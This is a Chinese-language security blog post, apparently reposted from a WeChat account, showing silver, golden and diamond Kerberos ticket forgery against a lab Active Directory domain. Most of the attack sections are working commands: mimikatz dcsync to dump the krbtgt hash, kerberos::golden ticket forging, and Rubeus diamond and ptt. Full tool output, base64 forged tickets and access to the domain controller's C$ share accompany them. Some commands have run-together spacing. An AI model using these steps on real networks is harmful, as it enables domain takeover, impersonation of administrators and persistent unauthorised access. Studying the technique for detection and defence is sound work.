内网渗透 银/金/钻石票据

admin 2022年7月12日21:44:39评论492 views字数 17860阅读59分32秒阅读模式

内网渗透 银/金/钻石票据

1

白银票据(SilverTickets)

原理

Kerberos认证的第5步,Client带着ST和身份认证-3Server上的某个服务进行请求,Server接收到了Client发送的请求之后,通过自己的ket解密ST,从而获得一个sessionkey,通过解密的sessionkey验证对方的身份,验证成功就可以使Client访问Server上的指定的服务

白银票据伪造的是TGS票据,不需要和域控打交道。白银票据使用要访问服务的hash,而不是krbtgthash。需要注意的一点是,伪造的白银票据没有带有有KDC签名的PAC,如果目标主机配置为验证KDCPAC签名,则白银票据将不起作用。白银票据只能访问指定的服务。

内网渗透 银/金/钻石票据

需要导出krbtgtHash

mimikatzlog "lsadump::dcsync /domain:test.local /user:krbtgt"

找到SID

whoami/user

需要域名称

netconfig workstation

准备

1.域名nami.com

2.sidS-1-5-21-1332701932-261370409-2888687086-500

3.目标服务器名WIN-A7DM9L6CVHH.nami.com

4.可利用的服务cifs

5.服务账号的NTMLHASH a6f9a989c9fad5637b1e1e941286da19

6.需要伪造的用户名tset

mimikatz.exe"kerberos::golden /domain:nami.com/sid:S-1-5-21-1332701932-261370409-2888687086/target:WIN-A7DM9L6CVHH.nami.com /service:cifs/rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt" "exit"

mimikatz执行结果

.#####.  mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /***Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  /##       > https://blog.gentilkiwi.com/mimikatz '## v ##'      Vincent LE TOUX             ( [email protected] ) '#####'        > https://pingcastle.com / https://mysmartlogon.com***/
mimikatz(commandline) # kerberos::golden/domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086/target:WIN-A7DM9L6CVHH.nami.com /service:cifs/rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /pttUser : testaDomain : nami.com (NAMI)SID :S-1-5-21-1332701932-261370409-2888687086User Id : 500GroupsId : *513 512 520 518 519 ServiceKey:a6f9a989c9fad5637b1e1e941286da19 - rc4_hmac_nt Service :cifsTarget : WIN-A7DM9L6CVHH.nami.comLifetime :2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16->Ticket : ** Pass The Ticket **
* PAC generated *PAC signed * EncTicketPart generated * EncTicketPartencrypted * KrbCred generated
Golden ticket for'testa @ nami.com' successfully submitted for currentsession
mimikatz(commandline) # exitBye!

查看票据

Rebues.exe klistAction:List Kerberos Tickets (Current User)
[*] Current LUID :0x67e95
UserName : win7 Domain : NAMI0 LogonId : 0x67e95 UserSID :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage : Kerberos LogonType :Interactive LogonTime : 2022/7/9 18:51:29 LogonServer : WIN-A7DM9L6CVHH LogonServerDNSDomain : NAMI.COM UserPrincipalName :[email protected]
[0] - 0x17 - rc4_hmac Start/End/MaxRenew: 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/719:27:16 Server Name :cifs/WIN-A7DM9L6CVHH.nami.com @ nami.com Client Name : testa @ nami.com Flags : pre_authent,renewable, forwardable (40a00000)


访问DCcifs服务

C:Userswin7.NAMI0>dir\WIN-A7DM9L6CVHH.nami.comc$
驱动器\WIN-A7DM9L6CVHH.nami.comc$中的卷没有标签。
卷的序列号是1EDD-1C0F

\WIN-A7DM9L6CVHH.nami.comc$ 的目录

2022/03/22 22:20         1,345,536 msf.exe2016/07/16  21:23    <DIR>         PerfLogs2022/03/22  21:05    <DIR>         Program Files2016/07/16  21:23    <DIR>          ProgramFiles (x86)2022/03/22  23:06             7,168shell3.exe2022/03/22  21:03    <DIR>         Users2022/03/22  23:35    <DIR>          Windows              2 个文件     1,352,704字节              5 个目录51,494,420,480可用字节


使用Rebues.exepruge之后就会清空票据

Rubeus.exe purge
[*] Action: Purge Tickets Luid: 0x0 [+] Tickets successfully purged!

C:Userswin7.NAMI0Desktop>dir\WIN-A7DM9L6CVHH.nami.comc$

拒绝访问。

2

黄金票据(GoldenTicket)

原理

黄金票据伪造的是TGT,在Kerberos认证中的第3步。在身份认证成功之后,AS使用krbtgthash加密TGT票据返回给Client。如果知道了krbtgt用户的密码hash可以直接伪造任意用户的TGT出来,所以就没有与域控制器的AS_REQAS_REP进行通信了。

内网渗透 银/金/钻石票据

准备

1、域名称nami.com

2、域的SIDS-1-5-21-1332701932-261370409-2888687086-502

3、域的KRBTGT账号的HASH5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37

4、伪造任意用户名testb

执行mimikatz命令,制作黄金票据

mimikatz.exe"kerberos::golden /user:Administrator /domain:nami.com/sid:S-1-5-21-1332701932-261370409-2888687086/aes256:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/ticket:Administrator.kiribi" "exit"

mimikatz执行结果

.#####.  mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /***Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  /##       > https://blog.gentilkiwi.com/mimikatz '## v ##'      Vincent LE TOUX             ( [email protected] ) '#####'        > https://pingcastle.com / https://mysmartlogon.com***/
mimikatz(commandline) # kerberos::pttAdministrator.kiribi
* File: 'Administrator.kiribi':OK
mimikatz(commandline) # exitBye!



mimikatz.exe"kerberos::ptt Administrator.kiribi" "exit" ______ _ (_____ | | _____) )_ _| |__ _____ _ _ ___ | __ /|| | | _ | ___ | | | |/___) | | | |_| | |_) ) ____| |_||___ | |_| |_|____/|____/|_____)____/(___/
v2.1.1

Action: List Kerberos Tickets (CurrentUser)
[*] Current LUID : 0x67e95
UserName : win7 Domain : NAMI0 LogonId : 0x67e95 UserSID :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage : Kerberos LogonType :Interactive LogonTime : 2022/7/9 18:51:29 LogonServer : WIN-A7DM9L6CVHH LogonServerDNSDomain : NAMI.COM UserPrincipalName :win7@nami.com
[0] - 0x12 - aes256_cts_hmac_sha1 Start/End/MaxRenew: 2022/7/10 20:12:25 ; 2032/7/7 20:12:25 ;2032/7/7 20:12:25 Server Name : krbtgt/nami.com @nami.com Client Name : Administrator @ nami.com Flags : pre_authent, initial, renewable, forwardable(40e00000)
[1] - 0x12 - aes256_cts_hmac_sha1 Start/End/MaxRenew: 2022/7/10 20:12:42 ; 2022/7/11 6:12:42 ;2022/7/17 20:12:42 Server Name :cifs/WIN-A7DM9L6CVHH.nami.com @ NAMI.COM

 Client Name      : Administrator @ nami.com
     Flags             :name_canonicalize, ok_as_delegate, pre_authent, renewable,forwardable (40a50000)


dir\WIN-A7DM9L6CVHH.nami.comc$

C:Userswin7.NAMI0>dir\WIN-A7DM9L6CVHH.nami.comc$
驱动器\WIN-A7DM9L6CVHH.nami.comc$中的卷没有标签。
卷的序列号是1EDD-1C0F

\WIN-A7DM9L6CVHH.nami.comc$ 的目录

2022/03/22 22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>         PerfLogs
2022/03/22  21:05    <DIR>         Program Files
2016/07/16  21:23    <DIR>          ProgramFiles (x86)
2022/03/22  23:06             7,168shell3.exe
2022/03/22  21:03    <DIR>         Users
2022/03/22  23:35    <DIR>          Windows
             2 个文件     1,352,704字节
             5
个目录51,494,420,480可用字节

3

钻石票据(diamondticket)

原理

黄金票据和钻石票据都需要Krbgtg密钥。黄金票据攻击利用了从头开始伪造TGT,而钻石票据攻击利用了对域控制器请求的真实TGT进行解密和重新加密的能力。

准备

1、域krbtgthash

2、当前域用户的账号密码

3、域名

4、域控的名称

假设已经获得了krbtgt

krbtgt: 5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37

使用域用户用户名密码创建一个钻石TGT

Rubeus.exediamond/krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/user:win7 /password:admin@7 /enctype:aes /domain:nami.com/dc:WIN-A7DM9L6CVHH.nami.com /ticketuser:thor /ticketuserid:1104/groups:512

输出结果

 ______       _                        (_____       | |                       _____) )_   _| |__  _____ _   _  ___   |  __  /|| | |  _ | ___ | | | |/___)  | |   | |_| | |_) ) ____| |_||___ |  |_|   |_|____/|____/|_____)____/(___/
v2.1.1
[*] Action: Diamond Ticket
[*] Usingdomain controller: WIN-A7DM9L6CVHH.nami.com (10.0.20.16)[!]Pre-Authentication required![!] AES256 Salt: NAMI.COMwin7[*]Using aes256_cts_hmac_sha1 hash:052F11E5B96B8E8699FF99E32E6BF2A4005C8B31FDD67DD88F8F9F08EBD65F02[*]Building AS-REQ (w/ preauth) for: 'nami.comwin7'[*] Usingdomain controller: 10.0.20.16:88[+] TGT request successful![*]base64(ticket.kirbi):
doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5lnP9C/TjjQvkCaRG 9YQuorVlVI7ZBcAgFbo7W5Wq2g8P44QYX8G0dtTOwJJ3xkujzCnO4jLtsvvSG35ph0xfxrzof28AYG6K 1qjiyTQZe2h9fBoWHRzf78jGQHc1Z/fMpwbtt0cr76g5ArbTGsW3jgNMoz34pEuxv/39H0TrtpNAw7Ih FXHCI8gfMrw8H3Vo4fVFsWiHaub5djsBx4g6Yj0WpjLrNeX6tY8ovFNA9E2CLNqL+YVLc+29IwMlz0m/ /b8pE+2KZDzhUWZ19kQjqD8wGs54Zro7jPlOqD51OYGvhllhpuDtOlSk+2+fiZMkb81eYe/3WCyzcWd5 ehn3Ut5IQzelrt2NWM4mZOcXpTEWno1YSC8QhexN4B17y2apILXVHe1u7w1TSG7U1L1ONet5lhW3sObH huYzPC7k1Sb3OH0rUdv20m75mfgXC51g3yT2FWJlwbetPJl3VRWiiM3grXC3St1BAVFFzynui9197Kad j8ZsAk3+6kOJvVvzBlGgR1CIXyOUGQH9EJ3fGuqrEBc5t+SjoZhVpCv8S2bbpav1yJYcE6UTDrlGlssj qHQK3kJMqmDz7iyYS1z7yH7DDDY/UACiIlUG4hvkv2HP5NU9I2ZQzY+5xtSmTW+bxED0tx+nj4XMcJeU +NUImXb1+dY/Fb6XYZred3OpR16wj4CbB65Zk6ze3naVnqm1z4IKiavi6nqkylwMmmBZaBP5HFTXQGyc mtec+smV3MmsBUiLCiOz12v2apDvUYS7gYiHZnD819F+u8K4eL8UBxLivt5dM+JzWcZL/x5NGlqvwckc rW6ARmgEM4PzjZ19LnvkmxlGfVT5P/8Dd5BsGHByHHNu2feM8kwXdxJn5KPXGSxJcRdCqGiLXH4wTo/5 kOKO9QEX0mEfe7R598Y1QAoC4n4VfLC5KhOm3KN5dCEFxynqDYQYOPfyWduAfVre90yxP4S/aKRbHHVn Rmq+iNzs9fJZavQLFOYnWWIgvsBk6Jm9WUeFqr/SHPnTxzkmblCjFi/H+pZSAg+4VkdjP+VGCIJGhKtF sxEcquf+JUb2ttARQb1c9OyGTbC7pJfzz7tp33wS21bzXiK3TsJ8NgKT9pBt0qOTqx5DkWXqKu8mpPYJ iYyxAjpRlaOO/tVY+0JZIF7PKVjT6xsLPlNfq5ocBBPrXrCXSPL8qGDCHUjEKrYgd1Khs/ToEXgmoKpm vNzAy4XDdIOdzZChpgwbYcS0gZI9YriO6C1xQNkSQgQp5d4MWNF7NVijgdYwgdOgAwIBAKKBywSByH2B xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCBEtEF4ifDsQ/GCwfhSOUphHOXJjPoaY/hIlQ8VrKL36aEK GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAEDhAAClERgPMjAyMjA3MTAxMDA5MDJaphEY DzIwMjIwNzEwMjAwOTAyWqcRGA8yMDIyMDcxNzEwMDkwMlqoChsITkFNSS5DT02pHTAboAMCAQKhFDAS GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT[*]Retreiving PAC[*] Modifying PAC[*] Signing PAC[*]Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0d wW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcF vnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0 JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqs Px5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmE dnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJ r/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRu snAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9o KRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ +oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4Jhqb daofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpP IdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdz U9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOT paMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfb Qgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR 1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6L eTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw KaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6AD AgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJa pxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D T00=




使用tgt deleg技巧创建钻石TGT:

C:Rubeus>Rubeus.exe diamond/krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/tgtdeleg /ticketuser:thor /ticketuserid:1104 /groups:512

输出结果

 ______       _                        (_____       | |                       _____) )_   _| |__  _____ _   _  ___   |  __  /|| | |  _ | ___ | | | |/___)  | |   | |_| | |_) ) ____| |_||___ |  |_|   |_|____/|____/|_____)____/(___/
v2.1.1
[*] Action: Diamond Ticket
[*] Notarget SPN specified, attempting to build 'cifs/dc.domain.com'[*]Initializing Kerberos GSS-API w/ fake delegation for target'cifs/WIN-A7DM9L6CVHH.nami.com'[+] Kerberos GSS-APIinitialization success![+] Delegation requset success! AP-REQdelegation ticket is now in GSS-API output.[*] Found the AP-REQdelegation ticket in the GSS-API output.[*] Authenticatoretype: aes256_cts_hmac_sha1[*] Extracted the service ticketsession key from the ticket cache:BzaMDaTaD6S9eF3ZYpZznQGqHim4GrZNG3N/1zyaubA=[+] Successfullydecrypted the authenticator[*] base64(ticket.kirbi):
doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5pe4JhXrlmSbGCz+w 1O1L1B0XEbFDJUO+8DbnCn3MT6P/tIt38Ly+Zrz8KWnhrRKMOqTfiwAaaQ4F/dhydnmbqEz79zgWf0Ie Fiu5ictNEUgNy2qR0WO4MOOiRfInPoWGXHs+aJW/rIEjT6y7QudUGhzLToBq3LZvZiI6JRo+Rk4NvPs3 E5S1LeSbwigxtrIgRYXV0O3qG0LMIlEbGzJjj71ZMMQZBoBY9ARCN4KWz6bsLomOqAPsaQzyHpPuoFmQ Uap5Mf3/p8gSj4zXdRiGz+4R3Mw2av83uos4bY5N4twSX6Tz8vra6hap2weEpaPFQJZrSriBQLpB0+em Kz2dRMLZU6oJqkZjvNxHtmq9fo3HebvjlXdT8k0Ww4jedFBrN5eQyezK6a55nr4R5IawK4a0wxwnnAmo J46kusBuqFYe4K/dqmuWAOaPUXIydF8WqlieSJiw5a97c3ZAJ/4AThFZnmO9hBX5GuT4oa+NowW8Vipz EmdyTZVujVcWnk5wlgvYiSZJP+ooY2B5z09FEZGWJJnnI1SA+yER2Y+vNtJ+vWxNhBYWdOboX137osmO 3LrPHUcVvxDV4n+7ml1BMa0FXiMmxwPptmht1DhV/7CdJBIi68dnnYLIXdLghqeYixlIc8H+gUHUEykg 5lmQ8iDgV9vKOYVI6uk7LERO8DkO6NnAswK4YpA2XGZiSdZqWgUYnNKRMjgF+lPski8pmE8VUQXP2h5t NBSvQrrivUs/8pAppETkXkLjv3xkIlzgEOwdl3gbcUDpPnGaT41YO/vrwymugRciuzfsMiwspV96Cith apcBahSxo7AA7PgMab9pOvYBnnxI1z0sPD7QhweXsf3Uwoz3Qy7xPyWZwjqdJ+uTPVvYLJtqahQ2kk2X sBESFzYlG8brnVDFORM8XaVI2+hCRgGj1uy/+3EPo8v+fMpt1a/jeS1/vfm8IcUBV9HpBVbdLp4SGoui lp9bWkhr+Bd19CwHJjqZfNBoJqfRd6TEwgKxWtjXWE28rHrqCKrm0brozF8j7EGCmzTZ3MFiQj/faMM2 yRMrlboD/in9fJiKbaXehlpE7qvSbpiANyqabdZRB/C4PAFtbf5a8xP2dmAt2nbKtxh3KLwi7kjgGI// 9vLJEwgx1No06DONFhKlP3WhoJ5VYDPfNSv8PKwYmrSKBGCmeiJ7vgpY+Q5/gtyNAj2j6kyX6B7vOLA7 ZTSskmNjuYAOYRhai6sGtvp0t+DIiSX1S+DYKyyq3aYNDvH6AaGSmpujgdYwgdOgAwIBAKKBywSByH2B xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCD/fE5Z49iKW+LbijggS7K44DP9DgIy9Rss1PIWjpTKoaEK GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAGChAAClERgPMjAyMjA3MTAwOTQ1NTBaphEY DzIwMjIwNzEwMTk0MTUzWqcRGA8yMDIyMDcxNzA5NDE1M1qoChsITkFNSS5DT02pHTAboAMCAQKhFDAS GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT[*]Retreiving PAC[*] Modifying PAC[*] Signing PAC[*]Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpSsngeghif/mcTl6M NYsPa2KZAP96iM+zjJtUi0Un9nK+uWmyWP7/tqurYDMX4UCuvsKlNY+hoU2el5GIntt4MfL0Qtj9805N qjpb2ta7dhPkptfEtobJXcaWpA1Yh8wExlteZxZDd6GdZN4lncQgRTN43IynDFMR8GiH+L7WcooqVaUm Lev9kjEnNVBFCAtT3qFhG6qgFdVgz6gg+ByC45QrLI8auJE3aVaKsfiSgm+GHii5v5VoMFT9/4mxfbLn cfLlpJR6mTDXYSqK/xCVuQeUqhmvE3/4sJ1UdAWWu/2TvuvRWN1TdzxvVW9HXzq8i+pK48MZaym8xBa6 pio1oJ+3ZqoU5UuH+tXXr/z+Iex32TsvJnX5vlUj7mOU1AsiV56axG/To05y15SfTn0eIqE2QBpcfvYs saqpVkoCHFeENkd36E0akHijmQA1OLJeJA0zkighHtsWnMLdJWUXSI5zZH0lOSsVssJ248OBqIaKOdnf 1bThgMLcvXTvKjxGYoiB+f1t8Catbv9cNqvKbq9/dlSf9nBZMGy60QFZNuqMqgwRrAXpLmiCCxZJtbIE vR38oJvHbkP75ugfMLsDrw5Ctl04lzRo+Big8Z+SDBUOtuGngnELdgCQqtqh7GiZtaFy4xQupzBqvhrG 2BY3I85IoD++5q8VrtKOI7GfD9GaDUZvjyA+bxfN7EXKJi9eOqt7mkmusz5o54zHgRerhYsQ7k16k14n ZlsA7ufT97Z1osvGPD7lAcA6b3SohY3IhrUHxwccFRNMLabfSHzT1TYlaT/+yByMA+eulPa9RE8yFDWn A2dEodb8EW06JWzHpI27R7dCrm6X11QOBT2gWFdMzm2klAjGfJDkD9doBADoqqwdIxwT2aTI32UHjlQd lsTwtfY0/wzCCAkwKQAAVxf93avCYDXh2y75Rcp5MvkCJJu3Z2SoYWRgYk2M3JcMTWGAyZJCPx8mQShF nkdgNGgnA2+ISVMUOMZsREv2ev8Jslzl4ii+Xqnwl1+fNYcMjdhBZmY2hYNENpTpxC/nBQcNftPeDniC vOwR7lRTE+tW39ylVRWlYV5y6SPyslVYWE+PfRauGcOAmZZmJNYJUCNjs3c9560zqKQEjBXQtyWJXXrq y7HZ+SFD95caxYK9cJp2YZLkjIEKUwxCjHcHvj1cA6Hy3TJTAgvxoxpPrYCDyRhG8OZ4RilZ8h7aOxMR 94mtBxnQNFbDAax1I6IHhWrc/D0pXZhvaaOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw KaADAgESoSIEIP98Tlnj2Ipb4tuKOCBLsrjgM/0OAjL1GyzU8haOlMqhoQobCE5BTUkuQ09NohEwD6AD AgEBoQgwBhsEdGhvcqMHAwUAYKEAAKURGA8yMDIyMDcxMDA5NDU1MFqmERgPMjAyMjA3MTAxOTQxNTNa pxEYDzIwMjIwNzE3MDk0MTUzWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D T00=




ptt导入票据

Rubeus.exeptt/ticket:doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0dwW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcFvnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqsPx5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmEdnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJr/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRusnAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9oKRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ+oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4JhqbdaofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpPIdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdzU9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOTpaMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfbQgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6LeTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCswKaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6ADAgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJapxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5DT00=

输出结果

 ______       _                        (_____       | |                       _____) )_   _| |__  _____ _   _  ___   |  __  /|| | |  _ | ___ | | | |/___)  | |   | |_| | |_) ) ____| |_||___ |  |_|   |_|____/|____/|_____)____/(___/
v2.1.1

Action: List Kerberos Tickets (CurrentUser)
[*] Current LUID : 0x67e95
UserName : win7 Domain : NAMI0 LogonId : 0x67e95 UserSID :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage : Kerberos LogonType :Interactive LogonTime : 2022/7/9 18:51:29 LogonServer : WIN-A7DM9L6CVHH LogonServerDNSDomain : NAMI.COM UserPrincipalName :win7@nami.com
[0] - 0x12 - aes256_cts_hmac_sha1 Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ;2022/7/17 18:09:02 Server Name : krbtgt/NAMI.COM @NAMI.COM Client Name : thor @ NAMI.COM Flags : name_canonicalize, pre_authent, initial,renewable, forwardable (40e10000)



查看票据

Action:List Kerberos Tickets (Current User)
[*] Current LUID :0x67e95
UserName : win7 Domain : NAMI0 LogonId : 0x67e95 UserSID :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage : Kerberos LogonType :Interactive LogonTime : 2022/7/9 18:51:29 LogonServer : WIN-A7DM9L6CVHH LogonServerDNSDomain : NAMI.COM UserPrincipalName :[email protected]
[0] - 0x12 - aes256_cts_hmac_sha1 Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ;2022/7/17 18:09:02 Server Name :krbtgt/NAMI.COM @ NAMI.COM Client Name : thor @NAMI.COM Flags : name_canonicalize,pre_authent, initial, renewable, forwardable (40e10000)

再次访问域控制器

C:Userswin7.NAMI0>dir\WIN-A7DM9L6CVHH.nami.comc$
驱动器\WIN-A7DM9L6CVHH.nami.comc$中的卷没有标签。
卷的序列号是1EDD-1C0F

\WIN-A7DM9L6CVHH.nami.comc$ 的目录

2022/03/22 22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>         PerfLogs
2022/03/22  21:05    <DIR>         Program Files
2016/07/16  21:23    <DIR>          ProgramFiles (x86)
2022/03/22  23:06             7,168shell3.exe
2022/03/22  21:03    <DIR>         Users
2022/03/22  23:35    <DIR>          Windows
             2 个文件     1,352,704字节
             5
个目录51,494,420,480可用字节

清除票据

C:Userswin7.NAMI0Desktop>Rubeus.exe klist
______ _ (_____ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ | ___| | | |/___) | | | |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/
v2.1.1

Action:List Kerberos Tickets (Current User)
[*] Current LUID :0x67e95


再次访问域控制器C:Userswin7.NAMI0>dir\WIN-A7DM9L6CVHH.nami.comc$拒绝访问。


4

关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

渗透培训

需要渗透测试培训联系暗月

内网渗透 银/金/钻石票据



原文始发于微信公众号(moonsec):内网渗透 银/金/钻石票据

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月12日21:44:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透 银/金/钻石票据http://cn-sec.com/archives/1172625.html

发表评论

匿名网友 填写信息